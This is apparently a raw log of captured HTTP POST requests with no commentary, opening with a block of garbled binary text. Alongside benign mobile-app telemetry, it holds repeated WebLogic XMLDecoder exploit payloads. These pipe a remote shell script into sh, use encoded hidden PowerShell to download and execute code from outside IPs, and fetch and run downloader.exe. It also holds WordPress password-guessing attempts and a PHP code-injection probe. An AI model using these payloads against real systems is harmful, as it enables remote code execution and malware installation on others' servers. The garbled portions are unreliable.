w€|`9dAVp
Mo)M\WRexTP$fnax]Huíbu(
aJLZgj-: wR"5=dWHmS?\[MZ+jOXV[a~rTL[Z>'B6=[S TDBC
rG[QXne
ArW_TJdzDYS^ay
dRVYT+WVAX4|Tc
UN?M]^5,L6UYRh,D]ZH{kXjP^PJ;)AW3,Kf
TjyD^5{5DM'WVZFu?
aJLrWy-AT6A8<%>@[$AH
/<W@AuseDCBly@^ZXf|fPVUNdC@A	us
VfAQ
d~AVd-aB_^?yB
W4y|L[ZezU
Z4~I4ATV@kpCUZZc+NQc_\Y5YAus|L[@mM]UZge
B>\L0f8 L&A
:jYNHmxcVBCrD]VXn{`P^W@iAT[Fu*
rRA9GT\n(W1W[TN;)GYZd{dJLZgjY_4|KP`QA>MX_3qf\o|WOu&
gDCBl~YNus
Q?IH
:!B
$"MF2E
CT=WVQFu:
aS\XJl}EXUZaqiPBCrW	VSfq1V[VLlz
]b/NTbBQPMlNOH'k5Q^WLh)_[ScxIc\8|D[Q^3{NrYJCrD@Ausb^^R@qjAPu*G_~C	
8f8 L7ILMZ(jO]R[eyrWDTPIhzL^R_g}fRYYHedWAPupP6YSj~L
T6|eSMd,F^P_ck \LO<)FX[Xf|N4PXA8|
[\g/dVWCq3WAPf|&\[WKl{MYPFu9Fj
V;)	
8"^9PLMZ(jO]U]`p#\_PMoqG]VZchQZY@qjNYH`~3@UXTA;)@
PS3+MVe[A9yF\Rue
BrDTAe-D_UZ4pPeESIk
282
}FZYgzKT6TLT&jNYX{k^jV_SJozD@A9k3K@>-
y&ZQ1JLZgBUV^oe
ArW_TJdzDYS^ay
dRVYT+WVA]`{Q4P[X<}_Z5,LfESXl{E]H{kXjYH<-]n(PeWKdqS	ayhDM'WVQFu?
aSZMZ-&WVA	8$P2IDBC
rD_U^{k[jW[SAoy@\W\gg^VMZ>jON\`zK
1^SI<}_4y5AU^TLl,	AFu9
r^XVL;)Unq
3P[YLj~DZ\fT5BZ2jO]OH!k`P^WIkxE@A9k3K@(![

;0\[3WDBC
rE@Ause_\PMm|C\URc~dD
CB{DURRcpcS
Y?-QR2+KaXSM>jYNHmk4F^\XmqA^W	6(LiBQAn}E
^o-
O|_D
CBedWAPfyaQ^MZ-&WVA	8$Q<A.<M2*]@9PLMZ(jOXQYgz|L[Il}GUQ[by`^ZVLepYNHmkJaWTJo}Z2/T6A^]VAm-ATXb{
rTDTCHn.MXRe/I
4BTHd*EYgy3F^^QZ 
0



POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 392
Cache-Control: no-cache

QKdZwImcMaqDw3CJBsPEEj2cPDN/6B5MhGNggpTSNGprc+CKL4A3zWpOja/6ewMMqktK+P2A21i+ASKwjy4WT5zybyOpXi3RTOSkZipp7NUQWqdyK2aww+rrv9khXsoNBGewfpPGkafmf2MgUcxRim7dDfm8yyWz2Li4H6Nh1T2lSnRk4kfr3eaSW6A4gZ1NsqY+rDDN0uqd9Q3uSSSzdCUcEE+sj9jCA9BKpzbEuj4IhUmjyLzZtGJryZ40pUKBfkecQJs5a/CTr5gJZ0fqmwwb39G+51IcXT6clXqB7/wvk2xkC8MPRaTXaQPvQV5sFICQopu1rbfI66pRSW4zURPWjUh7shq/ePMFLoQ4ZCDFWIp6FFOeJ6jA4//VUhFisWVPH6MI

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 396
Cache-Control: no-cache

Ra0Nxd/NY4H0ZwiZktelL5OztaQeALYZ34SJrkDPvV0uZJxnG2SAmDcX+uDBu/FziMMdmQ0aN2iF26cYrZfL3fwkf1GckYeqmZHlyJiW4xeZHK67oRDwvWhbXS+YonqHRY43z5x0aLtx5zIewMFxUfOFVUkMcQYMHRmelr/jav07da+RHYbF/VIbHCf+WrrGBxaiblnDcm2xks6gp+NQksnmkAZngL8FOOqMi3VVvdaiLbuNadviJzU0RAwQwN7oRyMuxb0MxNAoifDkSIPotajZ8OIZNv145VcI6jLsQXv8H27gBf6h9gzCMUH8eXoBIg/8JaSNSiGWMBUQSP6EaaewcZkA+5hd1xvZiMACXECTiyfA6LIybsreJOl24DLRwTkYqMZuog==

POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 232
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=17&ac=50&pos=104280&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.native","des":"","sug":-1}]

POST http://check.proxyradar.com/azenv.php?auth=145906225033&a=PSCMN&i=1760126605&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAwADEALgAyADAAMAAuADQANQAuADcAOAAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 16
Cache-Control: no-cache

log=172&pwd=test

POST http://check.proxyradar.com/azenv.php?auth=152342041059&a=PSCMN&i=1082776598&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∂”â
Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îıÒY›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST http://123.249.24.233/POST_ip_port.php HTTP/1.1
Referer: http://x.x.x.x/POST_ip_port.phpAccept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 41
Pragma: no-cache

&verifycode=&ip_port=162.252.243.126:8080

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
£˚	2Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îö"Y›∆√«∆fl

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 436
Cache-Control: no-cache

EK0LlI/NYp/y/uug/i2cexMcryXDolsPyinQihrZZuRHKE0PWB1qkcRi1uvZZnTjiT90f3PdXNWosNLU7BlnJiGQiOkOGUZIfQ101CIbDYkqkEZ2FJ5qqGaXWJKsVPhpSogBviUEG90TmV7/IfgZiVkF/ozEXO9c5JbcQBrFZZqyLLVcTmAbx/1a/lFgTq51OC/ayxmVDF1M64jiewe7wBL3JvOLtV0fkfIviVAJC184NXXpkcDoBxMMYOysnUiBEVA/m8x8uXeEmBOnm07N/onrvNZF1DmuRXS0K+ENIWFcDDuMSBhHapwh1BZXVDEKee5Fk9ZmNl0mYiE/YOVmW25PyLe8Go0p+O8I0FiWqUWxA+jxTGc4H9s/ocH+AHyv44JYXrQjqUWQV/beyTOX8orAw/kn8zBcm4q+B9H2NN4Su5NOzrbG

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
‘ˆ˝}Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îéΩY›∆√«∆fl

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
t(ÛÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îgFY›∆√«∆fl

POST http://f2.doodlemobile.com/feature_server/geo-ip/test.php HTTP/1.1
Content-Length: 0
Content-Type: application/x-www-form-urlencoded
Host: f2.doodlemobile.com
Connection: Keep-Alive



POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1214



POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Length: 574
Content-Type: text/xml; charset=UTF-8
Accept-Encoding: gzip

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
  <java version="1.8" class="java.beans.XMLDecoder">
    <void id="url" class="java.net.URL">
      <string>http://83.171.104.73:4444/cve-2017-10271?target=http%3A%2F%2F45.62.210.15%3A7001%2Fwls-wsat%2FCoordinatorPortType</string>
    </void>
    <void idref="url">
      <void id="stream" method = "openStream" />
    </void>
  </java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache

log=admin&pwd=172qw

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>

POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47

axa=die('Hello, Peppa!'.(string)(111111111*9));

POST http://behacdn.ksmobile.net/cpsn HTTP/1.1
Accept-Encoding: gzip
Charset: UTF-8
Content-Type: multipart/form-data; boundary=----------------------------7d92221b604bc
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: behacdn.ksmobile.net
Connection: Keep-Alive
Content-Length: 558

.ˆ¬
ÍÕ`i+nC\KlE^Sz]#[@^zZr^kZ&=0OoBcpjb|êü†iÊ}#å±E∆
êfi£úà9Jʈ†¥◊ˇZ-©·¥"KÜ˚T(£ìÍ]¡y∫|áE◊	}R"íø)LÌs‡fl'áÖ† ≥fd®Øm⁄~≤'9“ç20◊<~
ÃÃ,ß›≥ø0áífl‰ëP‡ª,eœÍ≥Ï–}˙htm*∫¨⁄aï+åÜ‹TÀëÕ±ÒõpXπøYºõ-Sh2∞(‹™§%:‘†,$ŸΩPG뉗{7.oûπ${≥ɈêNƒ•˘EkÄA.Äâ¸ë÷√üÈ∫~ØÛ[…´•ƒl7(K‹Â√z<ƒîpt∑fi÷I«VÚ7·
A-råZ©fi‘J
b
‹ìÏÖÅY◊ÊF|Å6≤QR—C—W‚SJíö‹fl*>j[˚æ4™=ˇø€ê◊∞8ˇÙf£
¨eS≠‡î3dSxû›è.]™Ó∞{3&HN:/˚ LÇÏA/¸wàÇj≥̵Î]cØ^˘∂ˆÚG´9énxÂ/k_›Aòi´æh§˙“i¯f-Ù√N)_˝Z—í;NWe•ê!,¡îü≤i®9ƒ1ܢ˝aHÎAwJ•¸ƒÍ–

ª	ÉπNV”´t<g}ƒXhÇ∫g©AÒ–Úl¥Ìùax◊_û^v<ëÏ®˜‹uÈ◊≥kïQ0Nœ«rŸä

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1187

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACAAJABPAFMAIgA7AEkARQBYACAAJABXAEMALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQAyADAALgAyADUALgAxADQAOAAuADIAMAAyAC8AaQBtAGEAZwBlAHMALwB0AGUAcwB0AC8ARABMAC4AcABoAHAAJwApADsA</string>
    </void>
  </array>
    <void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>


POST http://uc.ucweb.com:80/ HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (Linux; U; Opera Mini/7.1.32052/30.3697; id; MI 4LTE Build/KTU84P) U2/1.0.0 UCMini/10.9.0.946 (SpeedMode; Android 4.4.4; MI 4LTE Build/KTU84P) Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 469
Host: uc.ucweb.com:80
Connection: Keep-Alive

<assign data="0tiawOjp+Yed19SRsLmnksOI0IKwt6ee3Yvdhqy4osXXiYiH5ay30YvLmtru4KqF34nHiq++uZ7aj8uT8eL204jWm968rPbJisuG2uWst9Kd3JvS5uv509ObpPqhutvzq5vJ3+D94/id3JvF5PyqhcyZm9bg/eTOidfUkefv+9SLm8ne3uz+w9Ob2oa0rLfKsdqBjqPp+MiJ1Yye8eL23syZmcHls7Xyrfub3Pb98tXMmYXS7+mqhYfdy5Pj+u7Xi4TL9Must8WD1o3WvKzW976bycP36+WazIrHgqOu+vie34DXvKymlNebyd7e7OTCn4TLgra+pJbeiNyRoePIw4CEy4K4v6ae3oDagbW7upCIgYuEsu+nhc7XjMf19+fC05uH1vWst9Ka3YDXvKzBlKTBs8HLyMbSmf2o/vXpwYi56rCE7ri1h4/QjY6jrLeI0M6Z"/>

POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
`äQ<Ã≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îêô1Y›∆√«∆fl

POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 32
Cache-Control: no-cache

log=jamesatchue&pwd=jamesatchue3

POST http://ucus.ucweb.com/usquery.php HTTP/1.1
Content-Type: text/xml
Accept: application/vnd.wap.xhtml+xml,application/xml,text/vnd.wap.wml,text/html,application/xhtml+xml,image/jpeg;q=0.5,image/png;q=0.5,image/gif;q=0.5,image/*;q=0.6,video/*,audio/*,*/*;q=0.6,/139
User-Agent: UCWEB/2.0 (MIDP-2.0; U; Adr 4.4.4; id; MI_4LTE) U2/1.0.0 UCBrowser/10.9.0.946 U2/1.0.0 Mobile
X-UCBrowser-Device-UA: Mozilla/5.0 (Linux; U; Android 4.4.4; id; MI_4LTE Build/KTU84P) AppleWebKit/528.5+ (KHTML, like Gecko) Version/3.1.2 Mobile Safari/525.20.1
Content-Length: 415
Host: ucus.ucweb.com
Connection: Keep-Alive



POST http://puds.ucweb.com/upgrade/index.xhtml?dataver=pb HTTP/1.1
Content-Length: 640
Host: puds.ucweb.com
Connection: Keep-Alive

_Œm90RˆÉp¯Ófl[∞√©˛¢îA`˙æœGçi/U8,PS‘!fl[;øÃÖr£¿$+ùzM*¥›„πsNÖüS»◊™ÿyíµÒRá˨‹ä‡πÛh`:ˇÆwzfZjJölÁ÷ãÆ°î 7±~˝+Ùæí;,Ç}Lg@XÈ”òÔ÷zÏé]ÁDıB§Ù·P|OJ{V≥Ω.pfl*˙+…¯îÏ}™Wßq¸@ı›9An±Z$‘flÉ’˝ú)˜@b¢Á∏£j©zÉ&	√ «ı…
…vÚÖ÷®´∏9∏*'iœfíĶ#Gv≈,‹§ø»äˇ(µ7∆‡.’Ö˙Tfè6Ép
Xε1úˆ`·ù/¡Tß$/O¥B+ëŸÆË/[)1SÌ∏z&Èy°JˆèØ;ùˇÖé[Xvo

}±Pıwß–8õ∏…‰™wVsñ=?ıfüϱ…pûÉBuÊ~¢ˇ‹˙d0[Wç_©é’ÀÆ[º∑J]û©·åÔÆÈ6ç–kïπ;ˇÙ1sÕ	Ç:ƒUaMÌ’>M≈"1°lg‚≈D™fi¸±ÿ#O.·|òàÖ/¢0J	ö•eÍWÄË~y#fÇr˘e®
õãqõèJ≥Ä$—Ÿÿ%Îö¬ó-ÒëusÖiÛløÓ£zeÂf´Àn∑á™ü„	ÙÌ{£s&ª
Î;@ù´¬é¢“,˝gbflFˇ.W_t?U~T —,Ú™∫ò√‚
N≥
.¿ŒF'
∏#~è™Ígo(≤WvØ,q‹
cfÕÜ/¸~‘hS}~	÷fl\˝Ó≠¡£≈‘ù˝ìgõ$q§ÆZfN;ÄJ”áÔ

POST http://check.proxyradar.com/azenv.php?auth=149520137641&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close

testPost=true



POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)

Å
∏ÏÕËÃ≈*ÄH!O“§∞î˛
º¶º¶º·Ê•¡Ã
∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±
∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î;;Y›∆√«∆fl

POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Content-Type: text/xml
Accept: text/html, application/xhtml+xml, */*
Accept-Encoding: gbk, GB2312
Accept-Language: zh-cn
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Upgrade-Insecure-Requests: 1
Content-Length: 847
Host: x.x.x.x:7001

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
     <soapenv:Header>
     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
     <java version="1.8.0_131" class="java.beans.XMLDecoder">
     <void class="java.lang.ProcessBuilder">
     <array class="java.lang.String" length="3">
     <void index="0">
     <string>cmd</string>
     </void>
     <void index="1">
     <string>/c</string>
     </void>
     <void index="2">
     <string>powershell (new-object System.Net.WebClient).DownloadFile('http://down.idc3389.top/downloader.exe','C:/Windows/temp/searsvc.exe');start C:/Windows/temp/searsvc.exe</string>
     </void>
     </array>
     <void method="start"/></void>
     </java>
     </work:WorkContext>
     </soapenv:Header>
     <soapenv:Body/>
    </soapenv:Envelope>

POST http://ssdk.adkmob.com/rp/ HTTP/1.1
Content-Length: 231
Content-Type: text/plain; charset=ISO-8859-1
Host: ssdk.adkmob.com
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; MI 4LTE Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Mobile Safari/537.36

v=17&ac=50&pos=32518&mid=104&lan=in_ID&ext=&cmver=51424845&mcc=510&mnc=10&pl=2&channelid=2010002546&lp=0&gaid=8776479c-11a4-48e7-8a70-96e640a29187&aid=6ccc52a8048214f&attach=[{"res":3003,"pkg":"com.mopub.banner","des":"","sug":-1}]

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
  <array class="java.lang.String" length="3">
    <void index="0">
      <string>cmd.exe</string>
    </void>
    <void index="1">
      <string>/c</string>
    </void>
    <void index="2">
      <string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
    </void>
  </array>
    <void method="start"/>
